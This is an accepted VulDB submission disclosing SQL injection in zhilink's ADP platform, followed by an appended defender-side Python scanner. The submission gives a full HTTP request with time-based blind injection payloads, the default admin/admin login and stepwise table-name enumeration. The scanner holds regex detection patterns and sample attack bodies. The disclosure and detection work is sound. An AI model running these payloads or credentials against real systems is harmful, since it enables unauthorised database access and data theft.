Submit #586697: zhilink 智互联(深圳)科技有限公司 ADP Application Developer Platform 应用开发者平台 zhlink V1.0.0 SQL Injection

Title: zhilink 智互联(深圳)科技有限公司 ADP Application Developer Platform 应用开发者平台 zhlink V1.0.0 SQL Injection
Description: http://x.x.x.x:8083/adpweb/a/base/barcodeDetail/ is vulnerable to SQL injection. Request:

POST /adpweb/a/base/barcodeDetail/ HTTP/1.1
Host: x.x.x.x:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 150
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cookie: zhilink.session.id=42141d9466524e3982434175479d0706; JSESSIONID=EEFF24767E83524537E66D81A353210D; lang=zh_CN; Hm_lvt_82116c626a8d504a5c0675073362ef6f=1733816177; Hm_lpvt_82116c626a8d504a5c0675073362ef6f=1733821639; HMACCOUNT=85856EEA2CB7DFFD; pageNo=1; pageSize=30
Origin: http://x.x.x.x:8083
Priority: u=4
Referer: http://x.x.x.x:8083/adpweb/a/base/barcodeDetail/
Sec-Gpc: 1
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

barcode=&barcodeNo='and(select*from(select+sleep(2))a/**/union/**/select+1)='&itemNo=&lotDateEnd=&lotDateStart=&pageNo=1&pageSize=30&sourceNo=&status=

Injection point parameters: barcodeNo, barcode, itemNo
After logging in with the default credentials admin/admin, manual time-based blind injection:
(1) Confirm the injection via the time delay.
(2) Extract the database name; enumeration gives the database name: srm
(3) Table name length:
barcode=&barcodeNo='and+(select*from(select+if(length(substr((select+table_name+from+information_schema.tables+where+table_schema='srm'+limit+1,1),1))=6,sleep(3),1))e+union+select+1)#&itemNo=&lotDateEnd=&lotDateStart=&pageNo=1&pageSize=30&sourceNo=&status=v
From the above, the length of the first table name is 16; brute-force the first table name. Request:
barcode=&barcodeNo='and+(select*from(select+if(ascii(substr((select+table_name+from+information_schema.tables+where+table_schema='srm'+limit+0,1),1,1))=100,sleep(3),1))e+union+select+1)#&itemNo=&lotDateEnd=&lotDateStart=&pageNo=1&pageSize=30&sourceNo=&status=
(4) Looking up the ASCII table gives the table name: db_backup_scheme; the other table names can be enumerated the same way.
(5) The first column name comes out as id. Continuing to enumerate, table db_backup_scheme has 15 columns.
Source: http://x.x.x.x:8082/adpweb/a/login
User: Charlie Zha (UID 85915)
Submission: 05/29/2025 12:05 (10 months ago)
Moderation: 06/19/2025 08:06 (21 days later)
Status: Accepted
VulDB entry: 313271 [zhilink 智互联(深圳)科技有限公司 ADP Application Developer Platform 应用开发者平台 barcodeDetail sql injection]
Points: 20
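A defender-side log-review helper, added here as an example and not part of the submission or of the vendor's product: it parses form bodies carrying the same parameter names as the barcodeDetail request and flags the time-delay, information_schema and UNION indicators the payloads in the description rely on. The sample bodies are constructed, and the indicator names and function names are assumptions of this example.

```python
import re
from urllib.parse import parse_qs

# Constructed sample request bodies. The first two follow the shape of the
# barcodeDetail payloads in the submission (time-based blind probes on barcodeNo);
# the third is a benign lookup with the same parameter names.
SAMPLE_BODIES = [
    "barcode=&barcodeNo='and(select*from(select+sleep(2))a/**/union/**/select+1)='"
    "&itemNo=&pageNo=1&pageSize=30",
    "barcode=&barcodeNo='and+(select*from(select+if(length(substr((select+table_name+from"
    "+information_schema.tables+where+table_schema='srm'+limit+1,1),1))=6,sleep(3),1))e"
    "+union+select+1)#&itemNo=&pageNo=1&pageSize=30",
    "barcode=&barcodeNo=BC-000123&itemNo=ITEM-7&pageNo=1&pageSize=30",
]

# Indicator patterns matched against each decoded parameter value. They cover the
# techniques visible in the submission: sleep()-based delays, information_schema
# reads, UNION splicing (including /**/ in place of whitespace) and quote breakout.
INDICATORS = {
    "time_delay": re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor\s+delay)\s*\(", re.I),
    "schema_probe": re.compile(r"information_schema\.", re.I),
    "union_select": re.compile(r"union(\s|/\*.*?\*/)+select", re.I),
    "comment_splice": re.compile(r"/\*\*/"),
    "quote_break": re.compile(r"^'|'\s*(and|or)\b", re.I),
}


def scan_body(body: str) -> dict:
    """Map each suspicious form parameter to the list of indicator names it triggers.

    parse_qs decodes '+' to space and keeps empty parameters, so the probe text is
    inspected in the form the application would hand to the database.
    """
    findings = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        hits = [k for k, rx in INDICATORS.items() if any(rx.search(v) for v in values)]
        if hits:
            findings[name] = hits
    return findings


def flagged_requests(bodies) -> list:
    """Return (index, findings) for every body that triggers at least one indicator."""
    return [(i, f) for i, b in enumerate(bodies) if (f := scan_body(b))]


if __name__ == "__main__":
    for i, f in flagged_requests(SAMPLE_BODIES):
        print(f"request {i}: {f}")
```

Run over an access log that records POST bodies, a hit on barcodeNo with both time_delay and quote_break is the signature of the probing described above and is worth an alert regardless of whether the response was slow.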